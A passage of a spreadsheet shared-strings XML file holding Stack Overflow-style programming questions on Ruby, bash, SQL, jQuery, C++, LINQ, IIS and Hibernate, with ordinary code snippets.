  </si>
  <si>
    <t>How do you spawn a child process in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to offload a block of code in my main process to child process to make it run concurrently. I also want to have the PID of the spawned child process so I can monitor and kill it if necessary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to I export a system scope environment variable in bash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to set a system environment variable from a bash script that would be available outside of the current scope.  So you would normally export environment variables like this: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;export MY_VAR=/opt/my_var&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;But I need the environment variable to be available at a system level though.  Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>maintaining ids in database that match client software enumerations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets say I have a table in a sql server 2000 database called TransactionType:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE [dbo].[TransactionType](
    [ID] [int] NOT NULL,
    [Description] [varchar](50) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL,
 CONSTRAINT [PK_TransactionType] PRIMARY KEY CLUSTERED 
(
    [ID] ASC
) ON [PRIMARY]
) ON [PRIMARY]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then have a transaction table with a column called TransactionTypeID, keyed off of the ID column of the TransactionType table.&lt;/p&gt;
&lt;p&gt;My .net client application is responsible for inserting transaction records and specifying the transaction type.  My first thought was to have an enumeration defined, casting the enumeration to an integer and passing that value to the database.  The issue is that potentially, someone could go into the database and change one of the IDs in the TransactionType table, making the IDs in the database out of synch with the IDs in the client applications enumeration.&lt;/p&gt;
&lt;p&gt;So, after my long winded eplanation, my question is, are there design patterns/techniques others use to combat this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP function which does syntax color parsing for multiple languages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a PHP site which displays code examples in various languages (C#, PHP, Perl, Ruby, etc.). Are there any PHP functions which add syntax coloring for these and other languages? &lt;/p&gt;
&lt;p&gt;If not, I would at least like to find that one built-in PHP function which does syntax coloring for PHP code, can't find it anymore. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I imitate the ASP.NET AjaxOptions delegate functions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using the &lt;code&gt;Ajax.BeginForm()&lt;/code&gt; helper in &lt;code&gt;ASP.Net MVC&lt;/code&gt;, I can pass options with names of different functions, for example one to run &lt;code&gt;OnBegin&lt;/code&gt;, one for &lt;code&gt;OnSuccess&lt;/code&gt; etc. How do these work "under the hood"?&lt;/p&gt;
&lt;p&gt;The reason I'm asking is that I'm extending this to provide a &lt;code&gt;JQuery&lt;/code&gt; based alternative, and I need to figure out how to get from having the method names specified in a &lt;code&gt;JSON&lt;/code&gt; string to actually calling them.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;AjaxOptions&lt;/code&gt; class has a method for serializing, in which it wraps the method name in the following way (in this example, the &lt;code&gt;AjaxOptions&lt;/code&gt; &lt;code&gt;OnSuccess&lt;/code&gt; property is set to &lt;code&gt;mySuccessFunction(p)&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;onSuccess: Function.createDelegate(this, mySuccessFunction(p))&lt;/pre&gt;
&lt;p&gt;I have produced my own &lt;code&gt;JQueryAjaxOptions&lt;/code&gt; class, which serializes in the same way (but with some extra options available). So asically, what I have available in my method for posting the form is the above property as part of a json object, and I need to be able to call the function.&lt;/p&gt;
&lt;p&gt;How can I accomplish this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I reformat form input before POST using Javascript (or Rails)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a field in my form labeled "Name" that will contain both the First &amp;amp; Last name.&lt;/p&gt;
&lt;p&gt;Our existing dynamic server (to which the form is being POSTed to), expects two separate fields (first name, last name). &lt;/p&gt;
&lt;p&gt;Can I use Javascript to split the user input into two separate variables before the form is posted to the server?  How would I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I improve performance of DataSet.ReadXml if I'm using a schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm have a ADO DataSet that I'm loading from its XML file via ReadXml.  The data and the schema are in separate files.&lt;/p&gt;
&lt;p&gt;Right now, it takes close to 13 seconds to load this DataSet.  I can cut this to 700 milliseconds if I don't read the DataSet's schema and just let ReadXml infer the schema, but then the resulting DataSet doesn't contain any constraints.&lt;/p&gt;
&lt;p&gt;I've tried doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Console.WriteLine("Reading dataset with external schema.");
ds.ReadXmlSchema(xsdPath);
Console.WriteLine("Reading the schema took {0} milliseconds.", sw.ElapsedMilliseconds);
foreach (DataTable dt in ds.Tables)
{
   dt.BeginLoadData();
}
ds.ReadXml(xmlPath);
Console.WriteLine("ReadXml completed after {0} milliseconds.", sw.ElapsedMilliseconds);
foreach (DataTable dt in ds.Tables)
{
   dt.EndLoadData();
}
Console.WriteLine("Process complete at {0} milliseconds.", sw.ElapsedMilliseconds);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I do this, reading the schema takes 27ms, and reading the DataSet takes 12000+ milliseconds.  And that's the time reported &lt;em&gt;before&lt;/em&gt; I call EndLoadData on all the DataTables.&lt;/p&gt;
&lt;p&gt;This is not an enormous amount of data - it's about 1.5mb, there are no nested relations, and all of the tables contain two or three columns of 6-30 characters.  The only thing I can figure that's different if I read the schema up front is that the schema includes all of the unique constraints.  But BeginLoadData is supposed to turn constraints off (as well as change notification, etc.).  So that shouldn't apply here.  (And yes, I've tried just setting EnforceConstraints to false.)&lt;/p&gt;
&lt;p&gt;I've read many reports of people improving the load time of DataSets by reading the schema first instead of having the object infer the schema.  In my case, inferring the schema makes for a process that's about 20 times faster than having the schema provided explicitly.&lt;/p&gt;
&lt;p&gt;This is making me a little crazy.  This DataSet's schema is generated off of metainformation, and I'm tempted to write a method that creates it programatically and just deseralizes it with an XmlReader.  But I'd much prefer not to.&lt;/p&gt;
&lt;p&gt;What am I missing?  What else can I do to improve the speed here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Emulate IDispatchEx in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;C# 3.0 Extension methods add extensions to the base Type making calling that method on all &lt;em&gt;instances&lt;/em&gt; of that Type legal.&lt;/p&gt;
&lt;p&gt;Now, JavaScript I know implements IDispatchEx through which it's possible to add methods to a specific instance.&lt;/p&gt;
&lt;p&gt;So how do I add a set of methods to an 'instance' of a C# class?  I know this is a Dynamic vs. Static Languages holy war territory. :)  Let me clarify my intention is NOT that.&lt;/p&gt;
&lt;p&gt;I just want to be able to add a set of events to an interface depending on the class implementing that interface.&lt;/p&gt;
&lt;p&gt;I was able to do that using Generics &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;inteface ISample&amp;lt;T&amp;gt; { T SupportedEvents; }  
class Sample : ISample&amp;lt;UIWidgetEvent&amp;gt;   {   }  
class Sample2 : ISample&amp;lt;NonVisualUIWidget&amp;gt; { }
class UIWidgetEvent { public EventHandler Clicked; }  
class NonVisualUIWidget {public EventHandler Expired;}
class TestSample
{  
    public void Test()
    {  
        new Sample().SupportedEvents.Clicked += ...
        new Sample2().SupportedEvents.Expired += ...
    }  
}  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I didn't like &lt;code&gt;SupportedEvents&lt;/code&gt; I want to be able to say &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Sample().Clicked +=...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I thought JavaScript (I know &lt;code&gt;C#&lt;/code&gt; is not &lt;code&gt;JS&lt;/code&gt; :))... AND &lt;code&gt;IDispatchEx&lt;/code&gt;, &lt;code&gt;IL Weaving&lt;/code&gt;, &lt;code&gt;Reflection.Emit&lt;/code&gt; etc. etc. and thought may be there's a way to do this... [Design time support would be nice but I can live without]&lt;/p&gt;
&lt;p&gt;Yes, I probably could do this "instance augmentation" with a Visitor pattern.
[Not sure if I could get the syntatic sugar though]&lt;/p&gt;
&lt;p&gt;Comments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I select a single element in jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table structure that looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
 &amp;lt;tr id="row1"&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 1 content1&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 1 content2&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 1 content3&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
 &amp;lt;/tr&amp;gt;
 &amp;lt;tr id="row2"&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 2 content1&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 2 content2&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 2 content3&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
 &amp;lt;/tr&amp;gt;
 &amp;lt;tr id="row3"&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 3 content1&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 3 content2&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
   &amp;lt;td&amp;gt;
     &amp;lt;div&amp;gt;row 3 content3&amp;lt;/div&amp;gt;
   &amp;lt;/td&amp;gt;
 &amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using jQuery I am trying to select the DIV in the second cell of the third row. I tried the following (amongst other things):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var d = $('#row3').children(':eq(1)').children(':eq(0)');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I get back is an array with a single element (the DIV I'm after) and I have to then access using d[0]. Why is jQuery returning a single element array, I thought using the selector above would return the DIV element directly?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="http://stackoverflow.com/questions/307500/how-do-i-select-an-element-in-jquery#307509"&gt;@Shog9&lt;/a&gt;&lt;/strong&gt; - Duh...Ok a light just switched on in my brain, I get it now. Cheers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tips on making good documentation for developers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm preparing documentation for an open source project. My target audience are developers.&lt;/p&gt;
&lt;p&gt;Right now, I'm working on the API, porting and code design sections.&lt;/p&gt;
&lt;p&gt;Anyone has any tips on making documentation for developers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do exceptions work (behind the scenes) in c++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I keep seeing people say that exceptions are slow but I never see any proof. So instead of asking if they are I will ask how do exceptions work behind the scene so I can make a decisions of when to use them and if they are slow.&lt;/p&gt;
&lt;p&gt;From what I know exceptions are the same thing as doing a bunch of return but it also checks when it needs to stop doing the return. How does it check when to do stop? I am taking a guess and saying there is a second stack which holds the type of exception and stack location then does returns until it gets there. I am also guessing the only time that stack is touch is on a throw and every try/catch. AFAICT implementing a similar behaviour with return code would take the same amount of time. But this is all a guess so I want to know.&lt;/p&gt;
&lt;p&gt;How do exceptions really work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to extract SharePoint list data to a separate SQL Server table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Edited:&lt;/strong&gt;
What is the easiest way to &lt;s&gt;scrape&lt;/s&gt; extract SharePoint list data to a separate SQL Server table? One condition: you're in a work environment where you don't control the SQL Server behind the SharePoint Server, so you can't just pull from the &lt;em&gt;UserData&lt;/em&gt; table.   &lt;/p&gt;
&lt;p&gt;Is there there any utilities that you can use to schedule a nightly extract?  &lt;/p&gt;
&lt;p&gt;Is Microsoft planning any improvement here for "SharePoint 4"?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update Jan 06, 2009:&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://connectionstrings.com/sharepoint"&gt;http://connectionstrings.com/sharepoint&lt;/a&gt;&lt;br /&gt;
For servers where office is not installed you will need:&lt;br /&gt;
&lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=7554F536-8C28-4598-9B72-EF94E038C891&amp;amp;displaylang=en"&gt;this download&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove duplicate values from an array in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I remove duplicate values from an array in PHP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In MVC, when do you use &lt;%= %&gt; and &lt;% %&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In asp.net mvc, when do we use:&lt;/p&gt;
&lt;p&gt;&amp;lt;%=  %&gt;&lt;/p&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;p&gt;&amp;lt;% %&gt;&lt;/p&gt;
&lt;p&gt;Do we ever need to put a ; (colon) ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I force a display font from inside a formula in Crystal Reports?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a report with a lot of formulas that translate the word "TRUE" into an "X" and "FALSE" into a blank space.&lt;/p&gt;
&lt;p&gt;I use these to put an "X" in a checkbox.&lt;/p&gt;
&lt;p&gt;Sometimes there is text after my checkbox.  To avoid slight shifts to the left and right, I print the "X" and the " " in a fixed width font.  It is very tedious to manually set the font for each field.&lt;/p&gt;
&lt;p&gt;Is there a way to specify a display font from inside the formula?&lt;/p&gt;
&lt;p&gt;Something like this would be nice:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DisplayFontName = "Courier New";  //wishful thinking
DisplayFontSize = 8;  //wishful thinking
//this is the code I'm currently using
if Uppercase({table.somefield}) = "TRUE" then "X"
else " "
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Complex builds in Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a few things that I cannot find a good way to perform in Visual Studio:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Pre-build step invokes a code generator that generates some source files which are later compiled. This can be solved to a limited extent by adding blank files to the project (which are later replaced with real generated files), but it does not work if I don't know names and/or the number of auto-generated source files. I can easily solve it in &lt;code&gt;GNU make&lt;/code&gt; using &lt;code&gt;$(wildcard generated/*.c)&lt;/code&gt;. How can I do something similar with Visual Studio?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Can I prevent pre-build/post-build event running if the files do not need to be modified (&lt;code&gt;"make"&lt;/code&gt; behaviour)? The current workaround is to write a wrapper script that will check timestamps for me, which works, but is a bit clunky.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;What is a good way to locate external libraries and headers installed outside of VS? In *nix case, they would normally be installed in the system paths, or located with &lt;code&gt;autoconf&lt;/code&gt;. I suppose I can specify paths with user-defined macros in project settings, but where is a good place to put these macros so they can be easily found and adjusted?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Just to be clear, I am aware that better Windows build systems exist (&lt;code&gt;CMake&lt;/code&gt;, &lt;code&gt;SCons&lt;/code&gt;), but they usually generate VS project files themselves, and I need to integrate this project into existing VS build system, so it is desirable that I have just plain VS project files, not generated ones.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing data to .NET C# WPF applications/DLLs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .NET C# WPF application that I am trying to make into a single-instance application using a Mutex. &lt;/p&gt;
&lt;p&gt;This .NET application is called by a C++-based DLL using CreateProcessAsUser() and is given parameters via environment variables. &lt;/p&gt;
&lt;p&gt;Subsequent instances will also be created by the C++ DLL in the same way.&lt;/p&gt;
&lt;p&gt;Subsequent instances would then need to pass their parameters to the first instance of the application before exiting.&lt;/p&gt;
&lt;p&gt;The problem is what methods can be used in the .NET application so that the subsequent instances would be able to pass their data to the first instance of the .NET application? The simpler, the better.&lt;/p&gt;
&lt;p&gt;I have researched some but I hope there are simpler ways.&lt;/p&gt;
&lt;p&gt;Things I have researched:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Named Pipes &lt;/li&gt;
&lt;li&gt;.NET Remoting&lt;/li&gt;
&lt;li&gt;Windows Messaging (Sending WM_COPYDATA to the first instance window)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Since I am just trying to pass 4 strings to the first instance, I am trying to avoid the above mentioned methods because they are somewhat overkill for my problem.&lt;/p&gt;
&lt;p&gt;The simplest I can think of is to export a function from the .NET application so that the subsequent instances of the .NET application can just call this function on the first instance of the .NET application and pass the data as the parameters of the function. However, is this possible in .NET? I've read that .NET EXE or DLLs could not export functions.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showing processing message in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to show the processing information or log in the original page when the submitted request is being served until it completes the execution. I thought it would be meaningful to the user to know what is happening behind the request.&lt;/p&gt;
&lt;p&gt;I don't find a clue to do so though, can you guys help me out as how people are doing like this one below one - for your reference&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.xml-sitemaps.com/" rel="nofollow"&gt;http://www.xml-sitemaps.com/&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Procedure to submit iPhone application to App Store?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it necessary to pay $99 before I can watch the video to submit an iPhone application to the App Store, or it is available free of cost anywhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good library/libraries for datastructures in assembler</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any good libraries (preferably with commented source) for standard datastructures (Linked list, array list, queue, stack etc.) for x86 (or others)
in Assembler ?
I don't like to reinvent (and debug !) the wheel....&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert a string to a date in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this may be simple but being C++ I doubt it will be. How do I convert a string in the form 01/01/2008 to a date so I can manipulate it? I am happy to break the string into the day month year constituents. Also happy if solution is Windows only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Netbeans or Eclipse for C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a pet project and need to do C++ development on Windows, Mac, Linux, and Solaris, and I've narrowed it down to Netbeans and Eclipse, so I was wonderig which is more solid as a C++ editor. I just need solid editing, good autocompletion for templated code ad external libraries, and project file management, the build tools are external, so thats irrelevant here, for my comparison.&lt;/p&gt;
&lt;p&gt;Thus which is a better choice?&lt;/p&gt;
&lt;p&gt;Note: I know I should be using emacs or vim, but the issue is, my theory at least, that I'm left handed, so I use my right side (design,creativity) of the brain more than the left side (logic, memory), so I just simply cannot use emacs or vim, my brain simply isn't compatible, I tried them many times too, even used emacs for a few months but it drove me crazy...&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you use Template Method Pattern in programming languages with closures/delegates/function pointers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been going back and forth between C# and Java for the last 8 years. &lt;/p&gt;
&lt;p&gt;One thing that strikes me is that I have completely stopped using the "Template Method" design pattern in C#. Actually, in C# I Have come to think of this pattern as an anti-pattern. &lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Template_method_pattern" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Template_method_pattern&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Coming back to Java, I find the pattern is alive and kicking. I still think it looks antique, but realise that there's no other way to do this in java. Java looks antique too ;)&lt;/p&gt;
&lt;p&gt;Since this is going to come up anyway, Why is it an antipattern ?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A lot of times it uses up your inheritance hierarchy for "the wrong reasons".&lt;/li&gt;
&lt;li&gt;Base classes have a tendency to become littered with all sorts of unrelated code.&lt;/li&gt;
&lt;li&gt;It forces you to lock down design, often quite early in the development process.  (Premature lock down in a lot of cases)&lt;/li&gt;
&lt;li&gt;Changing this at a later stage becomes just harder and harder.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So with closures/delegates/function pointers, you normally pass around some function instead of subclassing.&lt;/p&gt;
&lt;p&gt;So back to the question: &lt;/p&gt;
&lt;p&gt;If your language has closures/delegates/function, do you use the Template Method, and when?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make a thread dump in JBoss 4.0.5 on Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;br /&gt;
I'm running JBoss 4.0.5 on Windows 2003 x64 and wonder if there is any way to get a dump of all threads?  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;It's stared with FireDaemon so I don't have a console windows in which to ctrl-break.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It's running under java 1.5 so jstack won't work.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I tried some program someone had made called sendsignal.exe, which I think actually crashed JBoss (not certain, but not going to try it again), if this was because JBoss runs under win x64 or because it runs as LocalSystem and I only have access to an "ordinary" user I don't know. It actually worked on my laptop, but it's 32-bit and I'm running as the same user as JBoss there.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Someone has any other ideas that might work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ To SQL Weird Join Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple database with two tables. Users and Configurations. A user has a foreign key to link it to a particular configuration.&lt;/p&gt;
&lt;p&gt;I am having a strange problem where the following query always causes an inner join to the Configuration table regardless of the second parameter value. As far as I can tell, even though the "UserConfiguration =" part of the object initialisation is conditional, LINQ doesn't see that and determines that a relationship is followed in any case.&lt;/p&gt;
&lt;p&gt;If I actually remove that last initialisation, the whole thing works as expected. It doesn't inner join when loadConfiguration == false and it does join when loadConfiguration == true.&lt;/p&gt;
&lt;p&gt;Anyone got any ideas about this? Is this syntax just not going to work? The only thought I have now is to wrap the return in a basic if statement - I just wanted to avoid the duplicated lines.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public UserAccount GetByUsername(string username, bool loadConfiguration)
{
    using (Database database = new Database())
    {
        if (loadConfiguration)
        {
            DataLoadOptions loadOptions = new DataLoadOptions();
            loadOptions.LoadWith&amp;lt;User&amp;gt;(c =&amp;gt; c.Configuration);
            database.LoadOptions = loadOptions;
        }
        return (from c in database.Users
                where c.Username == username
                select new UserAccount
                {
                    ID = c.ID,
                    ConfigurationID = c.ConfigurationID,
                    Username = c.Username,
                    Password = c.Password.ToArray(),
                    HashSalt = c.HashSalt,
                    FirstName = c.FirstName,
                    LastName = c.LastName,
                    EmailAddress = c.EmailAddress,
                    UserConfiguration = (loadConfiguration) ? new ApplicationConfiguration
                    {
                        ID = c.Configuration.ID,
                        MonthlyAccountPrice = c.Configuration.MonthlyAccountPrice,
                        TrialAccountDays = c.Configuration.TrialAccountDays,
                        VAT = c.Configuration.VAT,
                        DateCreated = c.Configuration.DateCreated
                    } : null
                }).Single();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in advance,&lt;/p&gt;
&lt;p&gt;Martin.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select X Most Recent Non-Consecutive Days Worth of Data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone got any insight as to select x number of non-consecutive days worth of data? Dates are standard sql datetime. So for example I'd like to select 5 most recent days worth of data, but there could be many days gap between records, so just selecting records from 5 days ago and more recent will not do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does PageRank mean anything?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it a measure of anything that a developer or even manager can look at and get meaning from? I know at one time, it was all about the 7, 8, 9, and 10 PageRank. But is it still a valid measure of anything? If so, what can you learn from a PageRank?&lt;/p&gt;
&lt;p&gt;Note that I'm assuming that you have other measurements that you can analyze.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.net webservice publishing process question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a webservice that exists in an asp.net website.  When I publish the site to a test server I have to go into the bin folder and into the .svc file for the service and manually change the URL to correctly reflect the test server URL.  Is there a better way to handle something like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rewritepath and IIS Integrated Mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have big issue with url-rewriting for IIS 7.0.&lt;/p&gt;
&lt;p&gt;I've written simple module for rewriting for my NET3.5/IIS7 web application. Here is a part of the code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public void Init(HttpApplication context)
    {
        context.BeginRequest += new EventHandler(context_BeginRequest);
    }
    void context_BeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = sender as HttpApplication;
        if (app.Request.Path.Contains("pagetorewrite.aspx"))
            HttpContext.Current.RewritePath("~/otherpage.aspx");
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I register my module in web.config :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;system.webServer&amp;gt;
&amp;lt;validation validateIntegratedModeConfiguration="false"/&amp;gt;
&amp;lt;modules&amp;gt;
              &amp;lt;add name="MyModule" type="MyModule" preCondition="" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Under IIS 7.0 (Vista) using Classic ASP Pipeline it works perfect, but when I change pipeline mode to Integrated, then it stops working. There are no exceptions, errors and anything in debugger/events/logfiles - only message in a browser that page was not found. The stragnest thing is that pagename looks like mispelled or merged from parts of original page and rewrte-to page.&lt;/p&gt;
&lt;p&gt;I've deployed my code at another computer (also vista -but x64- and iis 7.0) and it works perfect in both modes.
It looks that there's an configuration issue or what?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dotnet: How do you get average character width for a font?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Windows Forms:&lt;/p&gt;
&lt;p&gt;For &lt;code&gt;System.Drawing&lt;/code&gt; there is a way to get the font height. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Font font = new Font("Arial", 10 , FontStyle.Regular);
float fontHeight = font.GetHeight(); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But how do you get the other text metrics like average character width?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>hibernate auto-discovery and generation of of database mappings to POJOs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any tools that auto-generate the hibernate POJOs by gathering information from the database?&lt;/p&gt;
&lt;p&gt;I made a perl script to do this after the schema got changed for the third or fourth time in a project i'm working with and just wondered if there is any established tool that will do this for me as my script is rather crude and needs some tweaking of the generated &lt;code&gt;.java&lt;/code&gt; and &lt;code&gt;.hbm.xml&lt;/code&gt; files.&lt;/p&gt;
&lt;p&gt;For example (based on what my script does), having a table &lt;code&gt;statement&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object_Name  Type_Name Base_Type Nulls Identity
------------ --------- --------- ----- --------
id           id_int    int       no    yes
id_user      id_tiny   tinyint   no    no
value        float     float     no    no
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like the program to autogenerate the following java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.some.company.schema;
import java.io.Serializable;
public class Statement implements Serializable {
    private static final long serialVersionUID = 1227171190L;
    private Integer id;
    private User user;
    private Float value;
    public void setId(Integer id){
        this.id = id;
    }
    public Integer getId(){
        return this.id;
    }
    public void setUser(User user){
        this.user = user;
    }
    public User getUser(){
        return this.user;
    }
    public void setValue(Float value){
        this.value = value;
    }
    public Float getValue(){
        return this.value;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the corresponding Hibernate mapping file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;!DOCTYPE hibernate-mapping PUBLIC
        "-//Hibernate/Hibernate Mapping DTD 3.0//EN"
        "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd"&amp;gt;
&amp;lt;hibernate-mapping&amp;gt;
    &amp;lt;class name="com.some.company.schema.Statement" table="statement"&amp;gt;
        &amp;lt;id name="id" column="id"&amp;gt;
            &amp;lt;generator class="native" /&amp;gt;
        &amp;lt;/id&amp;gt;
        &amp;lt;many-to-one name="user" class="com.some.company.schema.User" column="id_user" not-null="true" /&amp;gt;
        &amp;lt;property name="value" column="value" not-null="true" /&amp;gt;
    &amp;lt;/class&amp;gt;
&amp;lt;/hibernate-mapping&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Editing documents seamlessly in a Web Application</t>
  </si>
  <si>
